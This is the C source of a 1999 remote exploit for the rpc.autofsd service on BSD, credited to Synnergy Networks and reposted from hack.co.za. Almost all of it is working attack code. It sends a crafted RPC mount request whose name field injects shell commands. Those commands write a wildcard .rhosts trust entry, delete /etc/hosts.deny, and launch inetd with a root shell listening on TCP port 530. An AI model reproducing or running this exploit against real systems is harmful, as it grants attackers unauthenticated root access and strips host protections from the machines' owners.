// *** Synnergy Networks

// * Description:
//
// Remote exploit for rpc.autofsd on BSD. This will attempt to put a root shell
// on tcp port 530.

// * Author:
//
// guidob (guidob@synnergy.net)
// Synnergy Networks (c) 1999, http://www.synnergy.net

// * Greets:
//
// Synnergy Networks, LoU, Cindy

// * Comments:
//
// This will not work on all types and/or versions. 

// *** Synnergy Networks

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpc/xdr.h>
#include <signal.h>

#define AUTOFS_PROG ((u_long)100099)
#define AUTOFS_VERS ((u_long)1)
#define AUTOFS_MOUNT ((u_long)1)

#define AT 8
#define A_MAXNAME 255
#define A_MAXOPTS 255
#define A_MAXPATH 1024

struct mntrequest {
        char *name;     /* name to be looked up */
        char *map;      /* map to use     [2000]*/
        char *opts;     /* default options[2000]*/
        char *path;     /* mountpoint to use    */
};

struct mntres {
        int status;     /* 0=OK, otherwise an errno from <sys/errno.h> */
};

bool_t xdr_mntrequest(XDR *xdrs,struct mntrequest *objp){
  if (!xdr_string(xdrs, &objp->name, A_MAXNAME)) return (FALSE);
  if (!xdr_string(xdrs, &objp->map, A_MAXNAME))  return (FALSE);
  if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS)) return (FALSE);
  if (!xdr_string(xdrs, &objp->path, A_MAXPATH)) return (FALSE);
  return (TRUE);
}
void signal_handler(void) {
        exit(0);
}
bool_t xdr_mntres(XDR *xdrs,struct mntres *objp){
  if (!xdr_int(xdrs, &objp->status)) return (FALSE);
  return (TRUE);
}

main(int argc, char **argv){

  CLIENT *cl;
  struct mntrequest mntreq;
  struct mntres *res;
  struct sockaddr_in target;
  struct hostent *hp;
  struct timeval tm;
  char *host;
  enum clnt_stat stat;


int sd;

 signal(SIGALRM, signal_handler);

  alarm(AT);
  host=argv[1];

  if ((target.sin_addr.s_addr = inet_addr(host)) == -1) {
    if ((hp = gethostbyname(host)) == NULL) {
      printf("%s: cannot resolve\n", host);
      exit(1);
    } else
      target.sin_addr.s_addr = *(u_long *)hp->h_addr;
  }
  target.sin_family=AF_INET;
  target.sin_port=0;

  sd=RPC_ANYSOCK;
  tm.tv_sec=8;

  tm.tv_usec=0;
  if((cl=clntudp_create(&target,AUTOFS_PROG,AUTOFS_VERS,tm,&sd))==NULL) {
    clnt_pcreateerror("clnt_create");
    exit(0);
  }
  cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
  tm.tv_sec = 25;

/* echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob
*/
  mntreq.name=";echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo \"courier stream tcp nowait root /bin/sh sh -i\" > /tmp/bob;inetd /tmp/bob";
  mntreq.map="/bin/true";
  mntreq.path="/hosts";
  mntreq.opts="";
  bzero((char *)&res, sizeof(res));

  if ((stat = clnt_call(cl, AUTOFS_MOUNT, (xdrproc_t)xdr_mntrequest,&mntreq,
       (xdrproc_t)xdr_mntres, &res, tm)) != RPC_SUCCESS) {
    clnt_perror(cl, "clnt_call");
    exit(1);
  }

  clnt_destroy(cl);
}

// EOF
/*                    www.hack.co.za           [21 July 2000]*/